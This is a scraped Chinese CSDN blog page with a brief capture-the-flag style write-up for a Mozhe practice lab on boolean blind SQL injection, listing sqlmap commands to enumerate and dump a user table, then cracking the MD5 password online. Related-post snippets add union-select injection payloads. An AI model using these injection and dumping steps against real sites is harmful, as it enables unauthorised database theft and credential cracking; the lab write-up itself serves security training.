在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2024-07-25 15:47:17 发布
最新推荐文章于 2024-07-25 15:47:17 发布
阅读量889 收藏 2
点赞数
分类专栏: 在线靶场-墨者题目 文章标签: 墨者学院-靶场题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42079912/article/details/96456731
版权

解题方法:
运用sqlmap工具对数据库进行爆破
1.判断注入点存在:python sqlmap.py -u “ip”
2.判断数据库名称:python sqlmap.py -u “ip”–dbs
3.判断web当前使用的数据库:python sqlmap.py -u “ip”–current-dbs
4.判断web当前使用的数据表:python sqlmap.py -u “ip”-D database --tables
5.判断表中字段:python sqlmap.py -u “ip“-D dbs -T tables --columns
6.数据爆破:python sqlmap.py -u “ip“-D tourdata -T userb -C “a,b,c” --dump
在这里插入图片描述
得到用户名和密码,去百度寻找MD5解密,解码后得到密码在靶场网页登录得到key
MD5网页:https://www.cmd5.com/

笑棋
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入在线检测(sqlmapapi)
Skycrab
07-22 4万+
之前一搞渗透的同事问我,sqlmapapi.py是干啥的,我猜很多人都玩过sqlmap,但玩过sqlmapapi的应该比较少,今天就和大家一起看看如何使用以及一些美的地方。说白了,sqlmapapi.py就是提供了一个检查sql注入的接口,我们可以直接通过发送http请求扫描sql注入,获取扫描结果等一系列操作。    下面通过实例演示如何使用:一.启动服务器端服务器后端使用的是bottle,一个
墨者靶场 SQL注入漏洞测试(布尔盲注)
曹振国的博客
06-14 5186
初级 布尔盲注一、查看页面源代码,发现注入点二、sqlmap一把梭三、登录查看到key 一、查看页面源代码,发现注入点 二、sqlmap一把梭 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 查询库 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 701
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
靶场实战——SQL注入(第一关)
最新发布
weixin_58666006的博客
07-25 430
id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -id=1 union select 1,database() LIMIT 1,1 -- -输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?
SQL注入--靶场练习
wmr123456001的博客
02-11 2075
SQL注入靶场练习
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1233
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4347
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 798
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院——SQL注入漏洞测试(布尔盲注)
Lollipop_zhi的博客
01-11 384
启动靶场,熟悉的界面 点击登录下方的维护通知 地址栏醒目的id出现了,尝试一下id =1’ and 1=1,空白页面 直接开kali,上sqlmap 输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db 得到数据库名称:stormgroup 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tab..
墨者学院靶场SQL注入漏洞测试(布尔盲注)
BEGCCYD的博客
06-23 787
*这是我第一次在kali里面成功的把key找出来了,所以分享一下 **墨客学院靶场SQL注入漏洞测试(布尔盲注) IP地址 : 219.153.49.228 端口 : 43484 协议 : http 首先我输入了IP地址 看到这个后,我在想它手工注入一下,看它有没有漏洞 删除文本 引用文本 H2O is是液体。 210 运算结果是 1024。 ...
墨者学院;SQL手工注入在线靶场;SQLsever;
xiaochenhang的博客
08-21 1232
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
sql注入靶场练习
weixin_46976845的博客
03-19 5896
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
sql靶场搭建
antRain的博客
05-28 532
sqli-labs靶场搭建 参考WEB靶场搭建教程(PHPstudy+SQLllib+DVWA+upload-labs) 若mysql服务无法启动,检测电脑是否装了mysql ,如果装了 在 services.msc 把mysql 服务关掉,重启phpstudy ,重新启动mysql 在使用sqli-labs 重置数据库信息 Setup/reset Database for labs 报错: 从PHP5.0开始就不推荐使用mysql_connect()函数,到了php7.0则直接废弃了该函数 所以需要修
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 437
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
sql注入靶场实操
weixin_45711977的博客
06-23 3572
sql注入靶场实操
墨者学院SQL注入漏洞测试(布尔盲注)
没事我溜达
03-18 2109
靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 打开靶场 我们先判断注入点,通过and 1 = 1和and 1 = 2来判断 发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。 构造语句来证明我的想法 and length(database())= 10 发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlma...
在线靶场-墨者-SQL注入1-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2598
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值